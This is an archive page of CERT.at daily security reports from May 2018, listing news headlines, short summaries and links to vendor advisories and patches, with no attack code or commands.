Intel® Manycore Platform Software Stack (Intel® MPSS) for Linux and Windows ∗∗∗ --------------------------------------------- https://www.ibm.com/support/home/docdisplay?lndocid=MIGR-5099805 ∗∗∗ IBM Security Bulletin: Vulnerabilities in cURL/libcurl affect Intel® Manycore Platform Software Stack (Intel® MPSS) for Linux and Windows ∗∗∗ --------------------------------------------- https://www.ibm.com/support/home/docdisplay?lndocid=MIGR-5099804 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities within Jackson JSON library affect IBM Business Automation Workflow (CVE-2017-17485, CVE-2018-5968, CVE-2018-7489) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22015305 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java JRE affect IBM Tivoli Monitoring ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016198 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities GSKit bundled with IBM HTTP Server ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22015347 ∗∗∗ IBM Security Bulletin: Vulnerability in IBM WebSphere Application Server Affects IBM Emptoris Sourcing, IBM Emptoris Contract Management, IBM Emptoris Spend Analysis, IBM Emptoris Program Management and IBM Emptoris Service Procurement ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016159 ∗∗∗ IBM Security Bulletin: A Vulnerability in IBM Java Runtime Affects Optim Data Growth, Test Data Management and Application Retirement ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22014553 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Business Developer ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016029 ∗∗∗ IBM Security Bulletin: IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise edition are affected by James Clark Expat Vulnerabilities ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg2C1000380 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.05.2018
by Daily end-of-shift report 16 May '18

16 May '18

===================== = End-of-Day report = ===================== Timeframe: Dienstag 15-05-2018 18:00 − Mittwoch 16-05-2018 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers ∗∗∗ --------------------------------------------- An unidentified hacker group appears to have accidentally exposed two fully-working zero-days when theyve uploaded a weaponized PDF file to a public malware scanning engine. --------------------------------------------- https://www.bleepingcomputer.com/news/security/shadowy-hackers-accidentally… ∗∗∗ UPnP joins the just turn it off on consumer devices, already club ∗∗∗ --------------------------------------------- Before it amplifies DDoS attacks Universal Plug n Play, that eternal feast of the black-hat, has been identified as helping to amplify denial-of-service attacks. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2018/05/16/upnp_amplif… ∗∗∗ CPU-Lücke Spectre V2: Microcode-Updates jetzt unter Windows 10 1803, unter Linux lückenhaft ∗∗∗ --------------------------------------------- Microcode-Updates für Intel-Prozessoren, die unter Windows zum Schutz vor der Sicherheitslücke Spectre V2 nötig sind, kommen nun auch per Windows Update für aktuelle Installationen; bei Linux gibt es aber noch Probleme. --------------------------------------------- https://www.heise.de/-4050379 ===================== = Vulnerabilities = ===================== ∗∗∗ Advantech WebAccess ∗∗∗ --------------------------------------------- This advisory includes mitigations for numerous vulnerabilities in Advantechs WebAccess products. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 ∗∗∗ Red Hat Addresses DHCP Client Vulnerability ∗∗∗ --------------------------------------------- Original release date: May 16, 2018 Red Hat has released security updates to address a vulnerability in its Dynamic Host Configuration Protocol (DHCP) client packages for Red Hat Enterprise Linux 6 and 7. An attacker could exploit this vulnerability to take control of an affected system. --------------------------------------------- https://www.us-cert.gov/ncas/current-activity/2018/05/16/Red-Hat-Addresses-… ∗∗∗ XXE & XSS vulnerabilities in RSA Authentication Manager ∗∗∗ --------------------------------------------- RSA Authentication Manager is affected by several security vulnerabilities which can be exploited by an attacker to read arbitrary files, cause denial of service or attack other users of the web application with JavaScript code, browser exploits or Trojan horses. --------------------------------------------- https://www.sec-consult.com/en/blog/advisories/xxe-xss-vulnerabilities-in-r… ∗∗∗ CVE-2018-8176 | Microsoft PowerPoint Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- Affected Products: Microsoft Office 2016 for Mac Microsoft recommends that customers running Microsoft Office 2016 for Mac install the update to be protected from this vulnerability. --------------------------------------------- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (dhcp), Debian (xen), Fedora (dhcp, flac, kubernetes, leptonica, libgxps, LibRaw, matrix-synapse, mingw-LibRaw, mysql-mmm, patch, seamonkey, webkitgtk4, and xen), Mageia (389-ds-base, exempi, golang, graphite2, libpam4j, libraw, libsndfile, libtiff, perl, quassel, spring-ldap, util-linux, and wget), Oracle (dhcp and kernel), Red Hat (389-ds-base, chromium-browser, dhcp, docker-latest, firefox, kernel-alt, libvirt, qemu-kvm, redhat-vertualization-host, [...] --------------------------------------------- https://lwn.net/Articles/754653/ ∗∗∗ ZDI-18-468: (0Day) Delta Industrial Automation TPEditor TPE File Heap-based Buffer Overflow Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-18-468/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect IBM® SDK, Java™ Technology Edition ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22015806 ∗∗∗ IBM Security Bulletin: Vulnerabilities in IBM GSKit and IBM GSKit-Crypto affect IBM Performance Management products ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016091 ∗∗∗ IBM Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2017-15698, CVE-2017-15706, CVE-2018-1304, CVE-2018-1305) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22015795 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Application Dependency Discovery Manager (TADDM) – IBM Java SDK updates Jan 2018 ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22015927 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Algo Credit Manager ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22015591 ∗∗∗ IBM Security Bulletin: Vulnerabilities in libxml2 affect Intel® Manycore Platform Software Stack (Intel® MPSS) for Linux and Windows (CVE-2017-16931, CVE-2017-16932) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/home/docdisplay?lndocid=migr-5099803 ∗∗∗ IBM Security Bulletin: IBM API Connect is affected by an OPENSSL vulnerability (CVE-2017-3735) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22015811 ∗∗∗ [R1] Nessus 7.1.0 Fixes Multiple Vulnerabilities ∗∗∗ --------------------------------------------- http://www.tenable.com/security/tns-2018-05 ∗∗∗ Oracle Java SE vulnerability CVE-2018-2799 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K33924005 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 15.05.2018
by Daily end-of-shift report 15 May '18

15 May '18

===================== = End-of-Day report = ===================== Timeframe: Montag 14-05-2018 18:00 − Dienstag 15-05-2018 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Containers are here. What about container security? ∗∗∗ --------------------------------------------- The industry is gaga for container technologies like Docker and for good reason. According to ESG research, containers make up about 19 percent of hybrid cloud production workloads today, but in just two years’ time, containers will make up one-third of hybrid cloud production workloads. (Note: I am an ESG employee.) Container security issuesNot surprisingly, cybersecurity professionals say rapid growth and proliferation of application containers have led to several security issues:35 --------------------------------------------- https://www.csoonline.com/article/3273347/security/containers-are-here-what… ∗∗∗ IDG Contributor Network: Fact vs. fiction: 6 myths about container security ∗∗∗ --------------------------------------------- DevOps, containers and microservices are eating software development just as software is eating the world. But with the explosive growth of these technologies and methodologies, it’s becoming increasingly difficult to separate fact from fiction. This is particularly the case when talking container security. In this article, we take a look specifically at the myths surrounding container security [...] --------------------------------------------- https://www.csoonline.com/article/3272830/containers/fact-vs-fiction-6-myth… ∗∗∗ Code-Injection: Sicherheitslücke in Signals Desktop-Client ∗∗∗ --------------------------------------------- Eine Code-Injection-Lücke in Signals Desktop-Client ermöglicht es, aus der Ferne JavaScript auszuführen. Ein Update für die Electron-App steht bereit. (Signal, Sicherheitslücke) --------------------------------------------- https://www.golem.de/news/code-injection-sicherheitsluecke-in-signals-deskt… ∗∗∗ Warnung vor CryptoCode ∗∗∗ --------------------------------------------- Konsument/innen erhalten eine E-Mail von Bitcoin Austria. Bei dem Schreiben handelt es sich um Werbung für CryptoCode. Ein Link in der Nachricht führt auf cryptocode.online. Auf der Plattform sollen Besucher/innen Geld einzahlen, damit sie jeden Tag "$15.000" verdienen können. Das einbezahlte Geld ist verloren, denn eine Gewinnausschüttung gibt es nicht. --------------------------------------------- https://www.watchlist-internet.at/news/warnung-vor-cryptocode/ ∗∗∗ NIS Update ∗∗∗ --------------------------------------------- Am 9. Mai hätte Österreich die NIS-Direktive umgesetzt haben sollen. Das haben wir verpasst. Wir haben noch immer kein NIS-Gesetz, und leider auch noch keinen Entwurf dazu in Begutachtung. Aber: ein Teil der NIS-Thematik (Anbieter digitaler Dienste) fällt unter die Vollharmonisierung und wird daher direkt aus Brüssel heraus gültig. Die entsprechende Verordnung wurde im Jänner veröffentlicht und ist seit 10. Mai in Kraft. Will man wissen, [...] --------------------------------------------- http://www.cert.at/services/blog/20180515161108-2242.html ===================== = Vulnerabilities = ===================== ∗∗∗ SSA-914382 (Last Update: 2018-05-15): Denial-of-Service Vulnerability in SIMATIC S7-400 ∗∗∗ --------------------------------------------- SIMATIC S7-400 CPUs are affected by a security vulnerability which could lead to a Denial-of-Service condition of the PLC if specially crafted packets are received and processed.The affected SIMATIC S7-400 CPU hardware versions are in the product cancellation phase or already phased-out. Siemens recommends customers either upgrading to a new version or implementing specific countermeasures. --------------------------------------------- https://cert-portal.siemens.com/productcert/pdf/ssa-914382.pdf ∗∗∗ VMSA-2018-0011 ∗∗∗ --------------------------------------------- Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2018-0011.html ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (firefox, llpp, and webkit2gtk), Debian (kwallet-pam), Fedora (kernel and pam-kwallet), Gentoo (mpv), Oracle (389-ds-base, firefox, libvirt, and qemu-kvm), and Ubuntu (php5 and php5, php7.0, php7.1, php7.2). --------------------------------------------- https://lwn.net/Articles/754495/ ∗∗∗ BlackBerry powered by Android Security Bulletin - May 2018 ∗∗∗ --------------------------------------------- http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber… ∗∗∗ Red Hat JBoss Enterprise Application Platform: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://adv-archiv.dfn-cert.de/adv/2018-0922/ ∗∗∗ IBM Security Bulletin: API Connect Developer Portal is affected by a Drupal vulnerability (CVE-2018-7602) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22015829 ∗∗∗ IBM Security Bulletin: A vulnerability has been identified in IBM Spectrum Scale with CES stack enabled that could allow sensitive data to be included with service snaps. This data could be sent to IBM during service engagements (CVE-2018-1512) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=ssg1S1012325 ∗∗∗ IBM Security Bulletin: A vulnerability affects the IBM FlashSystem model V840 ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=ssg1S1012281 ∗∗∗ IBM Security Bulletin: A vulnerability affects the IBM FlashSystem models 840 and 900 ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012280 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect the IBM FlashSystem model V840 ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012283 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect the IBM FlashSystem models 840 and 900 ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012282 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1012263 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affects IBM InfoSphere Information Server ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22015254 ∗∗∗ IBM Security Bulletin: IBM Data Risk Manager has released VM v2.0.1 in response to the vulnerability known as Spectre. ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22013157 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Rational Application Developer for WebSphere Software ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016207 ∗∗∗ Linux kernel vulnerability CVE-2018-8897 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K17403481 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.05.2018
by Daily end-of-shift report 14 May '18

14 May '18

===================== = End-of-Day report = ===================== Timeframe: Freitag 11-05-2018 18:00 − Montag 14-05-2018 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ #efail #fail ∗∗∗ --------------------------------------------- Aktuell gehen Berichte um (Twitter, ars technica, EFF, ...), die vor einem Sicherheitsproblem mit verschlüsselten Mails berichten. Die EFF geht soweit, eine Deinstallation diverser Tools zu empfehlen. Während ich diesen Blogpost schreibe, gingen die Researcher mit ihren Ergebnissen online: https://efail.de/ Yay! Eine Vuln mit coolem Namen und Logo. Hier die wichtigsten Punkte: Das Problem ist nicht die Verschlüsselung, sondern liegt im automatischen [...] --------------------------------------------- http://www.cert.at/services/blog/20180514123156-2221.html ∗∗∗ Mit Electron entwickelte Cross-Plattform-Apps angreifbar ∗∗∗ --------------------------------------------- Cross-Plattform Desktop-Apps, die mit dem Electron Framework erstellt werden, können eine gefährliche Sicherheitslücke aufweisen, durch die ein Cross-Site Scripting Angriff auf sie denkbar ist. Das Electron-Team stellt ein Update zur Verfügung. --------------------------------------------- https://www.heise.de/-4048915 ∗∗∗ Some notes on eFail ∗∗∗ --------------------------------------------- Ive been busy trying to replicate the "eFail" PGP/SMIME bug. I thought Id write up some notes.PGP and S/MIME encrypt emails, so that eavesdroppers cant read them. The bugs potentially allow eavesdroppers to take the encrypted emails theyve captured and resend them to you, reformatted in a way that allows them to decrypt the messages. Disable remote/external content in email The most important defense is to disable "external" or "remote" content from being [...] --------------------------------------------- https://blog.erratasec.com/2018/05/some-notes-on-efail.html ===================== = Vulnerabilities = ===================== ∗∗∗ Security Bulletins Posted ∗∗∗ --------------------------------------------- Adobe has published security bulletins for Adobe Acrobat and Reader (APSB18-09) and AdobePhotoshop CC (APSB18-17). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant bulletin. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1553 ∗∗∗ Rockwell Automation FactoryTalk Activation Manager ∗∗∗ --------------------------------------------- This advisory was posted originally to the HSIN ICS-CERT library on April 12, 2018, and is being released to the NCCIC/ICS-CERT website. This advisory contains mitigations for cross-site scripting, and improper restriction of operations within the bounds of a memory buffer vulnerabilities in Rockwell Automation's FactoryTalk Activation Manager products. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-102-02 ∗∗∗ Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet ∗∗∗ --------------------------------------------- MyBiz MyProcureNet is affected by a critical arbitrary file upload vulnerability allowing an attacker to compromise the server by uploading a web shell for issuing OS commands. Furthermore it is affected by cross site scripting issues. --------------------------------------------- https://www.sec-consult.com/en/blog/advisories/arbitrary-file-upload-cross-… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (tiff and tiff3), Fedora (glusterfs, kernel, libgxps, LibRaw, postgresql, seamonkey, webkit2gtk3, wget, and xen), Mageia (afflib, flash-player-plugin, imagemagick, qpdf, and transmission), openSUSE (Chromium, opencv, and xen), SUSE (kernel), and Ubuntu (firefox). --------------------------------------------- https://lwn.net/Articles/754430/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.05.2018
by Daily end-of-shift report 11 May '18

11 May '18

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 09-05-2018 18:00 − Freitag 11-05-2018 18:00 Handler: Stefan Lenzhofer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Upcoming Security Updates for Adobe Acrobat and Reader (APSB18-09) ∗∗∗ --------------------------------------------- A prenotification Security Advisory (APSB18-09) has been posted regarding upcoming Adobe Acrobat and Reader updates scheduled for Monday, May 14, 2018. We will continue to provide updates on the upcoming release via the Security Advisory as well as the Adobe … Continue [...] --------------------------------------------- https://blogs.adobe.com/psirt/?p=1553 ∗∗∗ Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets ∗∗∗ --------------------------------------------- Five academics from the Vrije University in Amsterdam and one from the University of Cyprus have discovered a way for launching Rowhammer attacks via network packets and network cards. --------------------------------------------- https://www.bleepingcomputer.com/news/security/researchers-come-up-with-a-w… ∗∗∗ Lücke in Windows, Linux, macOS: Entwickler missverstehen Intel-Dokumentation ∗∗∗ --------------------------------------------- Weil ihre Entwickler die Dokumentation einer CPU-Funktion missverstanden haben, sind nun fast alle Betriebssysteme anfällig für Manipulationen des Kernel-Speichers. Updates für die Lücke wurden bereits verteilt. --------------------------------------------- https://www.heise.de/security/meldung/Luecke-in-Windows-Linux-macOS-Entwick… ∗∗∗ ATM attacks: How hackers are going for gold ∗∗∗ --------------------------------------------- Imagine winning the lottery and having an ATM spit huge amounts of cash at you. That's exactly what some cyber criminals are after. They're targeting ATMs and launching "jackpotting" attacks, forcing them to dispense bills like a winning slot machine. --------------------------------------------- https://www.helpnetsecurity.com/2018/05/11/atm-attacks/ ∗∗∗ Sicherheitslücke bei "Signal"-App für Mac ∗∗∗ --------------------------------------------- Nachrichten, die verschwinden sollen, leben in der Benachrichtigungsleiste weiter --------------------------------------------- http://derstandard.at/2000079519326 ∗∗∗ One year later: EternalBlue exploit more popular now than during WannaCryptor outbreak ∗∗∗ --------------------------------------------- The infamous outbreak may no longer be causing mayhem worldwide but the threat that enabled it is still very much alive and posing a major threat to unpatched and unprotected systems --------------------------------------------- https://www.welivesecurity.com/2018/05/10/one-year-later-eternalblue-exploi… ∗∗∗ LG patches RCE bug in smartphone keyboards ∗∗∗ --------------------------------------------- LG on Monday released a security update fixing a high-severity remote code execution vulnerability found in the default keyboards of all its mainstream smartphone models. --------------------------------------------- https://www.scmagazineuk.com/news/lg-patches-rce-bug-in-smartphone-keyboard… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (freetype2, libraw, and powerdns), CentOS (389-ds-base and kernel), Debian (php5, prosody, and wavpack), Fedora (ckeditor, fftw, flac, knot-resolver, patch, perl, and perl-Dancer2), Mageia (cups, flac, graphicsmagick, libcdio, libid3tag, and nextcloud), openSUSE (apache2), Oracle (389-ds-base and kernel), Red Hat (389-ds-base and flash-plugin), Scientific Linux (389-ds-base), Slackware (firefox and wget), SUSE (xen), and Ubuntu (wget). --------------------------------------------- https://lwn.net/Articles/754145/ ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (libmupdf, mupdf, mupdf-gl, and mupdf-tools), Debian (firebird2.5, firefox-esr, and wget), Fedora (ckeditor, drupal7, firefox, kubernetes, papi, perl-Dancer2, and quassel), openSUSE (cairo, firefox, ImageMagick, libapr1, nodejs6, php7, and tiff), Red Hat (qemu-kvm-rhev), Slackware (mariadb), SUSE (xen), and Ubuntu (openjdk-8). --------------------------------------------- https://lwn.net/Articles/754257/ ∗∗∗ Oracle Java SE vulnerability CVE-2018-2783 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K44923228 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.05.2018
by Daily end-of-shift report 09 May '18

09 May '18

===================== = End-of-Day report = ===================== Timeframe: Dienstag 08-05-2018 18:00 − Mittwoch 09-05-2018 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ "Hide and Seek" Becomes First IoT Botnet Capable of Surviving Device Reboots ∗∗∗ --------------------------------------------- Security researchers have discovered the first IoT botnet malware strain that can survive device reboots and remain on infected devices after the initial compromise. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-… ∗∗∗ PoC Developed for CoinHive Mining In Excel Using Custom JavaScript Functions ∗∗∗ --------------------------------------------- Within days of Microsoft announcing that they are introducing custom JavaScript equations in Excel, a security researcher has developed a way to use this method to load the CoinHive in-browser JavaScript miner within Excel. --------------------------------------------- https://www.bleepingcomputer.com/news/security/poc-developed-for-coinhive-m… ∗∗∗ Call for speakers One Conference ∗∗∗ --------------------------------------------- The international One Conference 2018 will take place on October 2 & 3 in The Hague. Overall theme of this edition is "Merging Worlds – Securing the connected future". --------------------------------------------- https://www.ncsc.nl/english/current-topics/news/call-for-speakers-one-confe… ∗∗∗ Nice Phishing Sample Delivering Trickbot, (Wed, May 9th) ∗∗∗ --------------------------------------------- Users have to deal with phishing for a very long time. Today, most of them remain dumb messages quickly redacted with a simple attached file and a message like "Click on me, its urgent!". Yesterday, I put my hands on a very nice sample that deserve to be dissected to demonstrate that phishing campaigns remain an excellent way to infect a computer! --------------------------------------------- https://isc.sans.edu/diary/rss/23641 ∗∗∗ Massive localstorage[.]tk Drupal Infection ∗∗∗ --------------------------------------------- After a series of critical Drupal vulnerabilities disclosed this spring, it’s not surprising to see a surge of massive Drupal infections like this one: [...] --------------------------------------------- https://blog.sucuri.net/2018/05/massive-localstorage-tk-drupal-infection.ht… ∗∗∗ Its 2018, and a webpage can still pwn your Windows PC – and apps can escape Hyper-V ∗∗∗ --------------------------------------------- Scores of bugs, from Edge and Office to kernel code to Adobe Flash, need fixing ASAP Patch Tuesday Microsoft and Adobe have patched a bunch of security bugs in their products that can be exploited by hackers to commandeer vulnerable computers, siphon peoples personal information, and so on. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2018/05/09/microsoft_w… ∗∗∗ Introducing Orchestrator decryption tool ∗∗∗ --------------------------------------------- Researched and written by Donny Maasland and Rindert Kramer Introduction During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s System Center Orchestrator. According to Microsoft, Orchestrator is a workflow management solution for data centers and can be used to automate the creation, [...] --------------------------------------------- https://blog.fox-it.com/2018/05/09/introducing-orchestrator-decryption-tool/ ∗∗∗ Netzwerkfähige Medizinprodukte besser schützen ∗∗∗ --------------------------------------------- https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2018/sicherheits… ∗∗∗ Gandcrab Ransomware Walks its Way onto Compromised Sites ∗∗∗ --------------------------------------------- This blog post authored by Nick Biasini with contributions from Nick Lister and Christopher Marczewski.Despite the recent decline in the prevalence of ransomware in the threat landscape, Cisco Talos has been monitoring the now widely distributed ransomware called Gandcrab. Gandcrab uses both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft. --------------------------------------------- https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html ∗∗∗ Google CTF 2018 is here ∗∗∗ --------------------------------------------- https://security.googleblog.com/2018/05/google-ctf-2018-is-here.html ∗∗∗ Gefälschte Mobilis GmbH-Bestellung verbreitet Schadsoftware ∗∗∗ --------------------------------------------- Kriminelle versenden eine gefälschte Bestellung der Mobilis GmbH. In dem geschäftlichen Schreiben fordern sie von Unternehmen, dass diese den Dateianhang für weiterführende Informationen zum Einkauf öffnen. In Wahrheit verbirgt er Schadsoftware. Aus diesem Grund ist es wichtig, dass Empfänger/in die vermeintliche Bestellung nicht öffnen und die Nachricht in ihren Spam-Ordner verschieben. --------------------------------------------- https://www.watchlist-internet.at/news/gefaelschte-mobilis-gmbh-bestellung-… ===================== = Vulnerabilities = ===================== ∗∗∗ CVE-2018-8897 ∗∗∗ --------------------------------------------- Aktuell gehen Medienberichte über einen Bug im Umgang von Betriebssystemen mit Intel und AMD CPUs umher, dazu hatten wir die ersten Rückfragen bezüglich der Kritikalität. Wir sehen das nicht tragisch: der Bug ist nach momentanem Wissensstand weder remote noch via JavaScript etc. ausnutzbar, und daher "nur" eine klassische Privilege Escalation. --------------------------------------------- http://www.cert.at/services/blog/20180509142228-2199.html ∗∗∗ Silex Technology SX-500/SD-320AN or GE Healthcare MobileLink ∗∗∗ --------------------------------------------- This medical advisory includes mitigations for improper authentication and OS command injection vulnerabilities in Silex Technology SX-500, SD-320AN, and GE Healthcare MobileLink devices. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-18-128-01 ∗∗∗ Siemens Medium Voltage SINAMICS Products ∗∗∗ --------------------------------------------- This advisory includes mitigations for improper input validation vulnerabilities in Siemens SINAMICS modular drive systems. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-128-01 ∗∗∗ Siemens Siveillance VMS ∗∗∗ --------------------------------------------- This advisory includes mitigations for a deserialization of untrusted data vulnerability in the Siemens Siveillance Video Management Software. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-128-02 ∗∗∗ Siemens Siveillance VMS Video Mobile App ∗∗∗ --------------------------------------------- This advisory includes mitigations for an improper certificate validation vulnerability in the Siemens Siveillance VMS mobile app. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-128-03 ∗∗∗ May 2018 Office Update Release ∗∗∗ --------------------------------------------- The May 2018 Public Update releases for Office are now available! This month, there are 30 security updates and 22 non-security updates. All of the security and non-security updates are listed in KB article 4133083. --------------------------------------------- https://blogs.technet.microsoft.com/office_sustained_engineering/2018/05/08… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (kernel), Gentoo (rsync), openSUSE (Chromium), Oracle (kernel), Red Hat (kernel and kernel-rt), Scientific Linux (kernel), SUSE (kernel and php7), and Ubuntu (dpdk, libraw, linux, linux-lts-trusty, linux-snapdragon, and webkit2gtk). --------------------------------------------- https://lwn.net/Articles/754021/ ∗∗∗ Security Update Summary ∗∗∗ --------------------------------------------- https://portal.msrc.microsoft.com/en-us/security-guidance/summary ∗∗∗ Security Advisory - Authentication Bypass Vulnerability in Some Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2018/huawei-sa-20180509-… ∗∗∗ Security Advisory - Authentication Bypass Vulnerability in Huawei iBMC Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2018/huawei-sa-20180509-… ∗∗∗ [R1] OpenSSL Stand-alone Patch Available for SecurityCenter versions 5.0 or Later ∗∗∗ --------------------------------------------- http://www.tenable.com/security/tns-2018-04 ∗∗∗ Oracle Java SE vulnerability CVE-2018-2811 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K01294982 ∗∗∗ Oracle Java SE vulnerability CVE-2018-2796 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K71021401 ∗∗∗ Oracle Java SE vulnerability CVE-2018-2798 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K24593421 Next End-of-Day report: 2018-05-11 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily